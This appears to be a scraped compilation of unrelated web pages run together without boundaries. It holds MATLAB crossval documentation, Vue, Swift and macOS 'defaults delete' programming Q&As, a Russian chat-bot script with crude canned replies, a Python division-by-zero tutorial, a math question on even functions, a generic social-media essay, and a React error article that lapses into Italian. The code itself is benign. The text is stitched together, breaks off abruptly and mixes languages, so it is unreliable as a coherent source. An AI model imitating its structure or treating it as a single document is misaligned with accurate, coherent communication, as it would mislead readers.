tbltest = table(X1test,X2test,ytest, ...
'VariableNames',{'Acceleration','Displacement','Weight'});
mdl = fitlm(tbltrain,'Weight ~ Acceleration + Displacement');
yfit = predict(mdl,tbltest);
MAE = mean(abs(yfit-tbltest.Weight));
adjMAE = MAE/range(tbltest.Weight);
errors = [MAE adjMAE];
end
Compute the misclassification error of a classification tree by using principal component analysis (PCA) and 5-fold cross-validation.
Load the fisheriris data set. The meas matrix contains flower measurements for 150 different flowers. The species variable lists the species for each flower.
load fisheriris
Create the custom function classf (shown at the end of this example). This function fits a classification tree to training data and then classifies test data. Use PCA inside the function to reduce the number of predictors used to create the tree model.
Note: If you use the live script file for this example, the classf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Create a cvpartition object for stratified 5-fold cross-validation. By default, cvpartition ensures that training and test sets have roughly the same proportions of flower species.
rng('default') % For reproducibility
cvp = cvpartition(species,'KFold',5);
Compute the 5-fold cross-validation misclassification error for the classification tree with predictor data meas and response variable species.
cvError = crossval('mcr',meas,species,'Predfun',@classf,'Partition',cvp)
cvError = 0.1067
This code creates the function classf.
function yfit = classf(Xtrain,ytrain,Xtest)
% Standardize the training predictor data. Then, find the
% principal components for the standardized training predictor
% data.
[Ztrain,Zmean,Zstd] = zscore(Xtrain);
[coeff,scoreTrain,~,~,explained,mu] = pca(Ztrain);
% Find the lowest number of principal components that account
% for at least 95% of the variability.
n = find(cumsum(explained)>=95,1);
% Find the n principal component scores for the standardized
% training predictor data. Train a classification tree model
% using only these scores.
scoreTrain95 = scoreTrain(:,1:n);
mdl = fitctree(scoreTrain95,ytrain);
% Find the n principal component scores for the transformed
% test data. Classify the test data.
Ztest = (Xtest-Zmean)./Zstd;
scoreTest95 = (Ztest-mu)*coeff(:,1:n);
yfit = predict(mdl,scoreTest95);
end
Create a confusion matrix from the 10-fold cross-validation results of a discriminant analysis model.
Note: Use classify when training speed is a concern. Otherwise, use fitcdiscr to create a discriminant analysis model. For an example that shows the same workflow as this example, but uses fitcdiscr, see Create Confusion Matrix Using Cross-Validation Predictions.
Load the fisheriris data set. X contains flower measurements for 150 different flowers, and y lists the species for each flower. Create a variable order that specifies the order of the flower species.
load fisheriris
X = meas;
y = species;
order = unique(y)
order = 3x1 cell
{'setosa' }
{'versicolor'}
{'virginica' }
Create a function handle named func for a function that completes the following steps:
• Take in training data (Xtrain and ytrain) and test data (Xtest and ytest).
• Use the training data to create a discriminant analysis model that classifies new data (Xtest). Create this model and classify new data by using the classify function.
• Compare the true test data classes (ytest) to the predicted test data values, and create a confusion matrix of the results by using the confusionmat function. Specify the class order by using 'Order',order.
func = @(Xtrain,ytrain,Xtest,ytest)confusionmat(ytest, ...
classify(Xtest,Xtrain,ytrain),'Order',order);
Create a cvpartition object for stratified 10-fold cross-validation. By default, cvpartition ensures that training and test sets have roughly the same proportions of flower species.
rng('default') % For reproducibility
cvp = cvpartition(y,'Kfold',10);
Compute the 10 test set confusion matrices for each partition of the predictor data X and response variable y. Each row of confMat corresponds to the confusion matrix results for one test set. Aggregate the results and create the final confusion matrix cvMat.
confMat = crossval(func,X,y,'Partition',cvp);
cvMat = reshape(sum(confMat),3,3)
cvMat = 3×3
50 0 0
0 48 2
0 1 49
Plot the confusion matrix as a confusion matrix chart by using confusionchart.
confusionchart(cvMat,order)
Input Arguments
Type of error estimate, specified as either 'mse' or 'mcr'.
Value | Description
'mse' | Mean squared error (MSE) — Appropriate for regression algorithms only
'mcr' | Misclassification rate, or proportion of misclassified observations — Appropriate for classification algorithms only
Data set, specified as a column vector, matrix, or array. The rows of X correspond to observations, and the columns of X generally correspond to variables. If you pass multiple data sets X1,...,XN to crossval, then all data sets must have the same number of rows.
Data Types: single | double | logical | char | string | cell | categorical
Response data, specified as a column vector or character array. The rows of y correspond to observations, and y must have the same number of rows as the predictor data X or X1,...,XN.
Data Types: single | double | logical | char | string | cell | categorical
Prediction function, specified as a function handle. You must create this function as an anonymous function, a function defined at the end of the .m or .mlx file containing the rest of your code, or a file on the MATLAB® path.
This table describes the required function syntax, given the type of predictor data passed to crossval.
Value | Predictor Data | Function Syntax
@myfunction | X
function yfit = myfunction(Xtrain,ytrain,Xtest)
% Calculate predicted response
...
end
• Xtrain — Subset of the observations in X used as training predictor data. The function uses Xtrain and ytrain to construct a classification or regression model.
• ytrain — Subset of the responses in y used as training response data. The rows of ytrain correspond to the same observations in the rows of Xtrain. The function uses Xtrain and ytrain to construct a classification or regression model.
• Xtest — Subset of the observations in X used as test predictor data. The function uses Xtest and the model trained on Xtrain and ytrain to compute the predicted values yfit.
• yfit — Set of predicted values for observations in Xtest. The yfit values form a column vector with the same number of rows as Xtest.
@myfunction | X1,...,XN
function yfit = myfunction(X1train,...,XNtrain,ytrain,X1test,...,XNtest)
% Calculate predicted response
...
end
• X1train,...,XNtrain — Subsets of the predictor data in X1,...,XN, respectively, that are used as training predictor data. The rows of X1train,...,XNtrain correspond to the same observations. The function uses X1train,...,XNtrain and ytrain to construct a classification or regression model.
• ytrain — Subset of the responses in y used as training response data. The rows of ytrain correspond to the same observations in the rows of X1train,...,XNtrain. The function uses X1train,...,XNtrain and ytrain to construct a classification or regression model.
• X1test,...,XNtest — Subsets of the observations in X1,...,XN, respectively, that are used as test predictor data. The rows of X1test,...,XNtest correspond to the same observations. The function uses X1test,...,XNtest and the model trained on X1train,...,XNtrain and ytrain to compute the predicted values yfit.
• yfit — Set of predicted values for observations in X1test,...,XNtest. The yfit values form a column vector with the same number of rows as X1test,...,XNtest.
Example: @(Xtrain,ytrain,Xtest)(Xtest*regress(ytrain,Xtrain));
Data Types: function_handle
Function to cross-validate, specified as a function handle. You must create this function as an anonymous function, a function defined at the end of the .m or .mlx file containing the rest of your code, or a file on the MATLAB path.
This table describes the required function syntax, given the type of data passed to crossval.
Value | Data | Function Syntax
@myfunction | X
function value = myfunction(Xtrain,Xtest)
% Calculation of value
...
end
• Xtrain — Subset of the observations in X used as training data. The function uses Xtrain to construct a model.
• Xtest — Subset of the observations in X used as test data. The function uses Xtest and the model trained on Xtrain to compute value.
• value — Quantity or variable. In most cases, value is a numeric scalar representing a loss estimate. value can also be an array, provided that the array size is the same for each partition of training and test data. If you want to return a variable output that can change size depending on the data partition, set value to be the cell scalar {output} instead.
@myfunction | X1,...,XN
function value = myfunction(X1train,...,XNtrain,X1test,...,XNtest)
% Calculation of value
...
end
• X1train,...,XNtrain — Subsets of the data in X1,...,XN, respectively, that are used as training data. The rows of X1train,...,XNtrain correspond to the same observations. The function uses X1train,...,XNtrain to construct a model.
• X1test,...,XNtest — Subsets of the data in X1,...,XN, respectively, that are used as test data. The rows of X1test,...,XNtest correspond to the same observations. The function uses X1test,...,XNtest and the model trained on X1train,...,XNtrain to compute value.
• value — Quantity or variable. In most cases, value is a numeric scalar representing a loss estimate. value can also be an array, provided that the array size is the same for each partition of training and test data. If you want to return a variable output that can change size depending on the data partition, set value to be the cell scalar {output} instead.
Data Types: function_handle
Name-Value Pair Arguments
Specify optional comma-separated pairs of Name,Value arguments. Name is the argument name and Value is the corresponding value. Name must appear inside quotes. You can specify several name and value pair arguments in any order as Name1,Value1,...,NameN,ValueN.
Example: crossval('mcr',meas,species,'Predfun',@classf,'KFold',5,'Stratify',species) specifies to compute the stratified 5-fold cross-validation misclassification rate for the classf function with predictor data meas and response variable species.
Fraction or number of observations used for holdout validation, specified as the comma-separated pair consisting of 'Holdout' and a scalar value in the range (0,1) or a positive integer scalar.
• If the Holdout value p is a scalar in the range (0,1), then crossval randomly selects and reserves approximately p*100% of the observations as test data.
• If the Holdout value p is a positive integer scalar, then crossval randomly selects and reserves p observations as test data.
In either case, crossval then trains the model specified by either fun or predfun using the rest of the data. Finally, the function uses the test data along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'Holdout',0.3
Example: 'Holdout',50
Data Types: single | double
Number of folds for k-fold cross-validation, specified as the comma-separated pair consisting of 'KFold' and a positive integer scalar greater than 1.
If you specify 'KFold',k, then crossval randomly partitions the data into k sets. For each set, the function reserves the set as test data, and trains the model specified by either fun or predfun using the other k – 1 sets. crossval then uses the test data along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'KFold',5
Data Types: single | double
Leave-one-out cross-validation, specified as the comma-separated pair consisting of 'Leaveout' and 1.
If you specify 'Leaveout',1, then for each observation, crossval reserves the observation as test data, and trains the model specified by either fun or predfun using the other observations. The function then uses the test observation along with the trained model to compute either values or err.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Example: 'Leaveout',1
Data Types: single | double
Number of Monte Carlo repetitions for validation, specified as the comma-separated pair consisting of 'MCReps' and a positive integer scalar. If the first input of crossval is 'mse' or 'mcr' (see criterion), then crossval returns the mean MSE or misclassification rate across all Monte Carlo repetitions. Otherwise, crossval concatenates the values from all Monte Carlo repetitions along the first dimension.
If you specify both Partition and MCReps, then the first Monte Carlo repetition uses the partition information in the cvpartition object, and the software calls the repartition object function to generate new partitions for each of the remaining repetitions.
Example: 'MCReps',5
Data Types: single | double
Cross-validation partition, specified as the comma-separated pair consisting of 'Partition' and a cvpartition partition object created by cvpartition. The partition object specifies the type of cross-validation and the indexing for the training and test sets.
When you use crossval, you cannot specify both Partition and Stratify. Instead, directly specify a stratified partition when you create the cvpartition partition object.
You can use only one of these four name-value pair arguments: Holdout, KFold, Leaveout, and Partition.
Variable specifying the groups used for stratification, specified as the comma-separated pair consisting of 'Stratify' and a column vector with the same number of rows as the data X or X1,...,XN.
When you specify Stratify, both the training and test sets have roughly the same class proportions as in the Stratify vector. The software treats NaNs, empty character vectors, empty strings, <missing> values, and <undefined> values in Stratify as missing data values, and ignores the corresponding rows of the data.
A good practice is to use stratification when you use cross-validation with classification algorithms. Otherwise, some test sets might not include observations for all classes.
When you use crossval, you cannot specify both Partition and Stratify. Instead, directly specify a stratified partition when you create the cvpartition partition object.
Data Types: single | double | logical | string | cell | categorical
Options for running computations in parallel and setting random streams, specified as the comma-separated pair consisting of 'Options' and a structure. Create the Options structure with statset. This table lists the option fields and their values.
Field Name | Value | Default
UseParallel | Set this value to true to run computations in parallel. | false
UseSubstreams | Set this value to true to run computations in parallel in a reproducible manner. To compute reproducibly, set Streams to a type that allows substreams: 'mlfg6331_64' or 'mrg32k3a'. | false
Streams | Specify this value as a RandStream object or a cell array consisting of one such object. | If you do not specify Streams, then crossval uses the default stream.
Note
You need Parallel Computing Toolbox™ to run computations in parallel.
Example: 'Options',statset('UseParallel',true)
Data Types: struct
Output Arguments
Mean squared error or misclassification rate, returned as a numeric scalar. The type of error depends on the criterion value.
Loss values, returned as a column vector or matrix. Each row of values corresponds to the output of fun for one partition of training and test data.
If the output returned by fun is multidimensional, then crossval reshapes the output and fits it into one row of values. For an example, see Create Confusion Matrix Using Cross-Validation.
Tips
• A good practice is to use stratification (see Stratify) when you use cross-validation with classification algorithms. Otherwise, some test sets might not include observations for all classes.
Alternative Functionality
Many classification and regression functions allow you to perform cross-validation directly.
• When you use fit functions such as fitcsvm, fitctree, and fitrtree, you can specify cross-validation options by using name-value pair arguments. Alternatively, you can first create models with these fit functions and then create a partitioned object by using the crossval object function. Use the kfoldLoss and kfoldPredict object functions to compute the loss and predicted values for the partitioned object. For more information, see ClassificationPartitionedModel and RegressionPartitionedModel.
• You can also specify cross-validation options when you perform lasso or elastic net regularization using lasso and lassoglm.
Extended Capabilities
Introduced in R2008a
How to download an Excel file in Vue.js?
How do I download a file using Vue.js?
1. Step 1: Install Vue CLI.
2. Step 2: Download Vue Project.
3. Step 3: Install Axios in Vue.
4. Step 4: Create Download File Component.
5. Step 5: Register Download File Component.
6. Step 6: Start Vue Application. (A minimal sketch of the download step is shown below.)
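As a rough illustration of Step 4, here is a minimal sketch of a download method using axios (installed in Step 3). The endpoint URL and file name are placeholders and not part of the original steps; the idea is to request the file as binary data and hand it to the browser through a temporary object URL.
// DownloadFile.vue – script part only (a sketch, not a definitive component).
import axios from "axios";

export default {
  methods: {
    async downloadFile() {
      // Placeholder URL: ask the server for the file as binary data.
      const response = await axios.get("https://example.com/files/report.xlsx", {
        responseType: "blob",
      });

      // Wrap the binary response in a temporary object URL and click a hidden link.
      const url = window.URL.createObjectURL(new Blob([response.data]));
      const link = document.createElement("a");
      link.href = url;
      link.setAttribute("download", "report.xlsx"); // placeholder file name
      document.body.appendChild(link);
      link.click();
      link.remove();
      window.URL.revokeObjectURL(url);
    },
  },
};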
How can I download an Excel file from a Web API?
1. Add the model class "Record.cs" to the Models folder in the "Solution Explorer".
2. In the "HomeController", write the code that exports the Excel file.
3. Now write the HTML markup in the "index.cshtml" file.
How can I download an Excel file using JavaScript?
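One common plain-JavaScript approach is to build the data in the browser and trigger a download that Excel can open. The sketch below is illustrative only: the rows and file name are invented, and it produces a CSV rather than a true .xlsx file (generating real .xlsx output would need a library such as SheetJS).
// Build a small CSV in the browser and trigger a download that Excel can open.
const rows = [
  ["Name", "Score"], // header row (example data)
  ["Alice", 95],
  ["Bob", 87],
];

const csv = rows.map((r) => r.join(",")).join("\n");
const blob = new Blob([csv], { type: "text/csv;charset=utf-8;" });

const link = document.createElement("a");
link.href = URL.createObjectURL(blob);
link.download = "export.csv"; // placeholder file name
document.body.appendChild(link);
link.click();
link.remove();
URL.revokeObjectURL(link.href);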
URLSession Conversion to Swift 3
I have converted to Swift 3 and am receiving the error message
'Cannot convert value of type (UnsafeRawPointer, NSRange,
UnsafeMutablePointer)->() to (UnsafeBufferPointer,
Data.index, inout Bool)-> Void.
My code:
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask,
didReceive data: Data) {
data.enumerateBytes{[weak self]
(pointer: UnsafeRawPointer,
range: NSRange,
stop: UnsafeMutablePointer<ObjCBool>) in
let newData = Data(bytes: UnsafePointer<UInt8>(pointer), count: range.length)
self!.mutableData.append(newData)
} }
What do I need to adapt to make it work?
Answer
You are already getting a Data object, and you want to append the data, so why are you doing all of this?
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data){
responseData?.append(data)
}
This will work fine.
For reference, look at https://github.com/ankitthakur/SwiftNetwork/tree/master/Sources/Shared
postinstall script packagemaker
Discussion in 'Mac Programming' started by BollywooD, Oct 18, 2009.
1. BollywooD macrumors 6502
#1
How do I delete a key in a plist file in a postinstall script?
I have tried:
Code:
#!/bin/sh
defaults delete $HOME/Library/Preferences/com.apple.Safari myKeyToDelete
The script deletes the entire plist file though, not just the key.
What am I doing wrong?
2. Guiyon macrumors 6502a
#2
IIRC, defaults does not use the path to the plist file, instead it uses the reverse-DN of the domain you want to alter. In this case it will be com.apple.Safari
So, according to the man page, you would want to call:
Code:
/usr/bin/defaults delete com.apple.Safari <KeyName>
3. BollywooD thread starter macrumors 6502
#3
I tried this:
Code:
#!/bin/sh
/usr/bin/defaults delete myKeyToDelete
which generates an error in the installer, and doesn't delete the key.
and this one:
Code:
#!/bin/sh
MY_UNUSED_KEY="com.apple.Safari myKeyToDelete"
if [ -d "MY_UNUSED_KEY" ]; then
echo "Removing unused preferences"
/usr/bin/defaults delete "MY_UNUSED_KEY"
fi
which doesn't generate an error, but also doesn't delete the key.
This shouldn't be that difficult...
4. Guiyon macrumors 6502a
#4
Reread the command I posted. You forgot to specify the domain you wanted to remove the key from.
5. BollywooD thread starter macrumors 6502
#5
I tried this too:
Code:
/usr/bin/defaults delete ~/Library/Preferences/com.apple.Safari myKeyToDelete
this deletes the entire plist file....
stupid PackageMaker!?...
6. BollywooD thread starter macrumors 6502
#6
I also posted the question to the installer-dev mailing lists, and found the solution to be:
Code:
su $USER -c "defaults delete com.apple.Safari myKeyToDelete"
:D
7. Guiyon macrumors 6502a
#7
Which is the exact command I posted.
8. chown33 macrumors 604
#8
That shell script doesn't work because you're using the literal string "MY_UNUSED_KEY", rather than expanding the value of the shell variable. To expand the shell variable, you should use "$MY_UNUSED_KEY".
Also, your defaults delete ... line is wrong for a second reason: you're quoting the expanded shell variable. So even if you had this:
Code:
/usr/bin/defaults delete "$MY_UNUSED_KEY"
It would still be wrong, because it would expand to this:
Code:
/usr/bin/defaults delete "com.apple.Safari myKeyToDelete"
It pays to actually understand the tools you're working with, whether that's the defaults command or the syntax of shell variables. RTFM.
It also pays to read replies before posting other failed attempts. RTFR.
9. BollywooD thread starter macrumors 6502
#9
Thanks for the crash course. I'm only just getting to grips with Obj-C, and now I need to learn another language...
:)
A chat with a bot that simulates a conversation
D
I have a chat-bot script that simulates a conversation with support, but in this example the bot only replies after the user sends a message. How can I make the bot post messages to this chat at random, independently of the user's actions?
<div id="test">
<div class="avatar"><div id="closed" class="closed"></div>
<div id="ava" class="ava"></div>
<div class="fio">
Гавриил Гавриилович
</div>
<div class="thepost">
дЫрэктар
</div>
<div id="print">
печатает
</div>
</div>
<div id="messgeAll"class="contText">
<div id="dialog">
</div>
</div>
<div class="textinter">
<input id="message" type="text" class="inp" placeholder="Введите сообщение ">
<input id="messClcik" value="ОК" class="butt" type="button">
</div>
</div>
var dialog = document.getElementById("dialog");
var mess = document.createElement('div');
var text = "Доброго времени. Чем могу помочь?";
var textNode = document.createTextNode(text);
setTimeout(function() {
mess.appendChild(textNode);
dialog.appendChild(mess);
dialog.className = "owner";
}, 4000);
var butonSend = document.getElementById("messClcik");
var messgeAll = document.getElementById("messgeAll");
butonSend.onclick = function() {
var theDiv = document.createElement('div');
var userMessage = document.getElementById("message");
if(userMessage.value != ''){
document.getElementById('ava').style="background:url('http://vamotkrytka.ru/_ph/80/2/15311132.gif');background-size:cover; "
document.getElementById('print').style= "display:block";
theDiv.innerHTML = userMessage.value;
theDiv.className = "user";
messgeAll.appendChild(theDiv);
setTimeout(function() {
var answear = "привет, У Володи Путина спроси, да ну нах.., как так?, я ушел, завтра пиши, дорого, еп те, по клавишам не попадаю, ты бухой?, иди проспись пьянь!";
var arr = answear.split(', ');
var rand = Math.floor(Math.random() * arr.length);
var newOwner = document.createElement('div');
newOwner.innerHTML = arr[rand];
newOwner.className = "owner";
messgeAll.appendChild(newOwner);
document.getElementById('ava').style="";
document.getElementById('print').style= "display:none";
}, 4000);
return true;
}else{
return false;
}
}
#test{
position:fixed;
width:230px;
height:300px;
border:5px solid #466991;
bottom:0;
right:5px;
border-radius:10px;
animation: show 2s 2s both ease-in-out;
overflow:hidden;
}
@keyframes show {
from {
height:0px;
}
to {
height:300px;
}
}
.avatar{
width:230px;
height:50px;
background:#466991;
color:#fff;
}
.ava{
padding-top:5px;
width:40px;
height:40px;
border-radius:50%;
background:url('http://a.deviantart.net/avatars/a/u/austin1297.jpg');
background-size:cover;
float:left;
margin-right:5px;
}
#print{
animation: printO 1s linear infinite;
font-size:12px;
padding:0;
display:none;
}
@keyframes printO {
from { background:#00FF11;}
to { background:#466991;}
}
.fio{
font-size:16px;
}
.thepost{
font-size:14px;
}
.closed{
}
.closed:before{
position:absolute;
content:"–";
font-weight:bold;
top:0;
right:5px;
font-size:25px;
cursor:pointer;
}
.contText{
position:relative;
height:225px;
word-wrap:break-word;
overflow:auto;
}
.dialog{
position:absolute;
bottom:0;
}
.owner,.user{
width:180px;
border-radius:10px;
padding:4px;
margin:2px 0;
}
.owner{
float:left;
background:#CEE7EC;
}
.user{
float:right;
background:#FFEEDE;
}
.textinter{
}
.inp{
float:left;
width:185px;
margin-left:1px;
border-radius:5px 0 0 5px;
}
.butt{
background:green;
border:solid 1px green;
border-radius:0 5px 5px 0;
color:#fff;
}
S
#1
Trigger it with a timeout.
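A minimal sketch of that idea, added for illustration: reuse the #messgeAll container and the .owner class from the snippet above, and schedule each bot message with a random delay. The phrases in the array are placeholders.
var botPhrases = ["hello", "are you still there?", "write back when you can"];

function postRandomBotMessage() {
  var container = document.getElementById("messgeAll");
  var msg = document.createElement("div");
  msg.className = "owner";
  msg.innerHTML = botPhrases[Math.floor(Math.random() * botPhrases.length)];
  container.appendChild(msg);
  // Schedule the next message after a random delay between 5 and 15 seconds.
  setTimeout(postRandomBotMessage, 5000 + Math.random() * 10000);
}

// Start the loop once, independently of any user action.
setTimeout(postRandomBotMessage, 5000);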
ZeroDivisionError: float division by zero in Python
Borislav Hadzhiev
Last updated: Apr 22, 2022
The Python "ZeroDivisionError: float division by zero" occurs when we try to divide a floating-point number by 0. To solve the error, use an if statement to check if the number you are dividing by is not zero, or handle the error in a try/except block.
Here is an example of how the error occurs.
main.py
a = 15.0
b = 0

# ⛔️ ZeroDivisionError: float division by zero
result = a / b
It's unclear what value is expected when we divide by 0, so Python throws an error.
When we divide a number by 0, the result tends towards infinity.
One way to solve the error is to check if the value we are dividing by is not 0.
main.py
a = 15.0
b = 0

if b != 0:
    result = a / b
else:
    result = 0

print(result)  # 👉️ 0
We check if the b variable doesn't store a 0 value and if it doesn't, we divide a by b.
Otherwise, we set the result variable to 0. Note that this could be any other value that suits your use case.
If setting the result variable to 0, if b is equal to 0 suits your use case, you can shorten this to a single line.
main.py
a = 15.0
b = 0

result = b and a / b
print(result)  # 👉️ 0
The expression x and y first evaluates x, and if x is falsy, its value is returned, otherwise, y is returned.
Since 0 is a falsy value, it gets returned if the b variable in the example stores a 0 value, otherwise the result of dividing a by b is returned.
Alternatively, you can use a try/except statement.
main.py
a = 15.0
b = 0

try:
    result = a / b
except ZeroDivisionError:
    result = 0

print(result)  # 👉️ 0
We try to divide a by b and if we get a ZeroDivisionError, the except block sets the result variable to 0.
The best way to solve the error is to figure out where the variable gets assigned a 0 and check whether that's the expected behavior.
Here are some common ways you might get a zero value unexpectedly.
main.py
print(int())     # 👉️ 0
print(int(0.9))  # 👉️ 0
Conclusion #
The Python "ZeroDivisionError: float division by zero" occurs when we try to divide a floating-point number by 0. To solve the error, use an if statement to check if the number you are dividing by is not zero, or handle the error in a try/except block.
Define and Discuss on Fundamental Identities
The prime objective of this article is to define and discuss fundamental identities. The article explains fundamental identities from the point of view of trigonometry, with examples and graphs. If an equation contains one or more variables and is valid for all replacement values of the variables for which both sides of the equation are defined, then the equation is known as an identity. The equation x² + 2x = x(x + 2), for instance, is an identity because it is valid for all replacement values of x.
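For concreteness, the reciprocal, quotient, and Pythagorean identities listed below are the ones usually referred to as the fundamental trigonometric identities; each holds for every angle $\theta$ at which both sides are defined (this listing is added as an illustration, since the article's own examples and graphs are not reproduced here):
$$\sin^2\theta + \cos^2\theta = 1, \qquad 1 + \tan^2\theta = \sec^2\theta, \qquad 1 + \cot^2\theta = \csc^2\theta$$
$$\tan\theta = \frac{\sin\theta}{\cos\theta}, \qquad \cot\theta = \frac{\cos\theta}{\sin\theta}, \qquad \sec\theta = \frac{1}{\cos\theta}, \qquad \csc\theta = \frac{1}{\sin\theta}$$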
Let $P : \mathbb{V}\rightarrow \mathbb{V}$ be the linear mapping, where $\mathbb{V}$ is the space of all real-valued functions of a real variable $x$, defined by setting the image under $P$ of a function $f(x)$ to be $$(Pf)(x)= \frac{f(x) + f(-x)}{2}.$$ What can I say about the image of $\mathbb{V}$ under $P$?
My initial hypothesis was that the image of the whole domain would be the set of all functions except the odd ones. I proved this in the case where $\mathbb{V}$ consists only of odd functions or only of even functions, but when trying to be more general, taking $\mathbb{V}$ to be the space defined in the first paragraph, I could not complete the proof. Does anyone know a way to do this?
• I don't understand how the image can contain odd functions. If $g(x) = \frac{f(x)+f(-x)}{2}$ then $g(-x) = g(x)$, so the image contains only even functions.
– gt6989b
Jun 7, 2016 at 15:07
• You're not on a bad track. Any real function decomposes uniquely as the sum of an odd and an even function.
– Pedro
Jun 7, 2016 at 15:08
• I agree that the image cannot contain odd functions, but this set could also contain a function which is neither odd nor even. Jun 7, 2016 at 16:20
• @PedroTamaroff Is there a name for this statement? I mean, where can I find more information about this? Jun 7, 2016 at 16:21
• @YassinRany No, it cannot; see Ashwin's answer.
– gt6989b
Jun 7, 2016 at 16:22
1 Answer
The image would be the set of all even functions. It's clear the image consists only of even functions because for every function $f(x)$, $\frac{f(x)+f(-x)}{2}$ is an even function. Also, the image consists of all even functions because if $g(x)$ is any even function, then $g(x)$ is in the preimage of $g(x)$. So $P$ is a map from the set of all functions onto the set of all even functions.
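To make the decomposition mentioned in the comments explicit: every $f \in \mathbb{V}$ splits uniquely as the sum of an even part and an odd part,
$$f(x) = \frac{f(x)+f(-x)}{2} + \frac{f(x)-f(-x)}{2},$$
where the first summand is even and the second is odd. So $P$ is exactly the projection onto the even part; in particular $P^2 = P$, and the image of $P$ is the subspace of all even functions.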
The Impact of Social Media on Modern Communication
Introduction Social media has profoundly transformed how we communicate, offering both opportunities and challenges. From staying connected with friends to sharing news and opinions, social media platforms have reshaped interpersonal communication in numerous ways.
Body Social media platforms such as Facebook, Twitter, and Instagram allow people to connect and share information instantly. These platforms facilitate communication across long distances, enabling users to maintain relationships with family and friends regardless of geographical barriers. Additionally, social media provides a space for individuals to express themselves and engage with diverse communities.
However, social media also presents challenges. The constant flow of information can lead to information overload and decreased attention spans. The prevalence of curated content and idealized portrayals of life can impact self-esteem and contribute to feelings of inadequacy. Furthermore, issues such as cyberbullying and privacy concerns are significant drawbacks of social media use.
To maximize the benefits of social media while mitigating its downsides, it is important to practice mindful usage. Set boundaries for social media use, such as limiting screen time and being selective about the content you consume. Engage with social media in a way that enhances your well-being and fosters positive connections.
Conclusion Social media has revolutionized modern communication, offering both advantages and challenges. By using social media mindfully and setting healthy boundaries, you can harness its benefits while minimizing its potential negative impacts on communication and well-being.
Have you run into the annoying "TypeError: Cannot Read Property 'Map' of Undefined" error in your React application? Debugging this error can be tricky, but don't worry: we've got you covered.
In this article, we'll walk through the most common causes and solutions to help you resolve this error. Whether you are an experienced React developer or just getting started, this guide will help you get your application back on track.
What Causes the "TypeError: Cannot Read Property 'Map' of Undefined" Error?
The "TypeError: Cannot Read Property 'Map' of Undefined" error usually occurs when you try to access a property or method of an undefined value in your React code.
Put simply, the error occurs when you try to map over an undefined value, such as an array that has not been initialized or that has not yet received data.
In the example below, you are fetching todo items from JSONPlaceholder data, but the map method is called before the data from the API request has arrived.
import { useState, useEffect } from 'react';
function App() {
const [todos, setTodos] = useState();
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))}
</div>
);
}
export default App;
The code above will throw the "TypeError: Cannot read properties of undefined (reading 'map')" message:
TypeError: Cannot read properties of undefined (reading 'map') error message
You will need to find a way to let React know that the todos state is an array even before the array is populated, or you will need to prevent the map method from running until the todos state variable has received its data from the API request.
3 Ways To Fix "TypeError: Cannot Read Property 'Map' of Undefined"
Here are three ways to fix the "TypeError: Cannot Read Property 'Map' of Undefined" error in React:
1. Initialize the state variable to an empty array
2. Use comparison operators
3. Use the optional chaining operator (?.)
Let's go through each of these solutions and how they can help fix the error in your React code.
1. Initialize the State Variable to an Empty Array
One straightforward solution to the "TypeError: Cannot Read Property 'Map' of Undefined" error is to make sure the array variable you are trying to map over is defined.
You can initialize the state variable to an empty array by default, so that the variable always exists and no error is thrown when you try to map over it.
For example, the following are two similar components: the state variable of the first is not initialized to an empty array, while in the second it is:
// Before initializing your state variable to an empty array
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList.map(item => <li>{item}</li>)}
</ul>
);
}
// After initializing your state variable to an empty array
function MyComponent() {
const [myList, setMyList] = useState([]);
return (
<ul>
{myList.map(item => <li>{item}</li>)}
</ul>
);
}
Nell’esempio precedente, la variabile di stato myList viene inizializzata di default su un array vuoto utilizzando useState([]). Questo assicura che anche se myList è inizialmente indefinito, sarà sempre un array e non lancerà il messaggio “TypeError: Cannot Read Property ‘Map’ of Undefined”.
Per l’esempio di fetch, potete anche inizializzare la variabile di stato todos a un array vuoto ([]):
import { useState, useEffect } from 'react';
function App() {
// Initialize the state to an empty array of todos.
const [todos, setTodos] = useState([]);
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))}
</div>
);
}
export default App;
2. Use Comparison Operators
Another solution is to use comparison operators to check whether the array variable is defined before mapping over it. You can use the ternary operator or the logical AND (&&) operator for this purpose.
Here are some examples using the ternary operator:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList ? myList.map(item => <li>{item}</li>) : null}
</ul>
);
}
In this example, you check whether the myList array variable is defined before trying to map over it. If myList is undefined, the ternary operator returns null and nothing is rendered. If myList is defined, the map function is called and the list items are rendered.
This works similarly to using the logical AND operator:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<ul>
{myList && myList.map(item => <li>{item}</li>)}
</ul>
);
}
Con l’uso di operatori di confronto come l’operatore ternario, è possibile gestire il caricamento, in modo da visualizzare qualcos’altro sullo schermo mentre si conducono i dati dall’API:
import { useState, useEffect } from 'react';
function App() {
const [todos, setTodos] = useState();
useEffect(() => {
const getTodos = async () => {
const response = await fetch(
'https://jsonplaceholder.typicode.com/todos?_limit=5'
);
const data = await response.json();
setTodos(data);
};
getTodos();
}, []);
console.log(todos);
return (
<div>
{todos ? (
todos.map((todo) => (
<div key={todo.id}>
<h2>Item: {todo.title}</h2>
</div>
))
) : (
<h1>Loading...</h1>
)}
</div>
);
}
export default App;
3. Utilizzare l’operatore di concatenamento opzionale (?.)
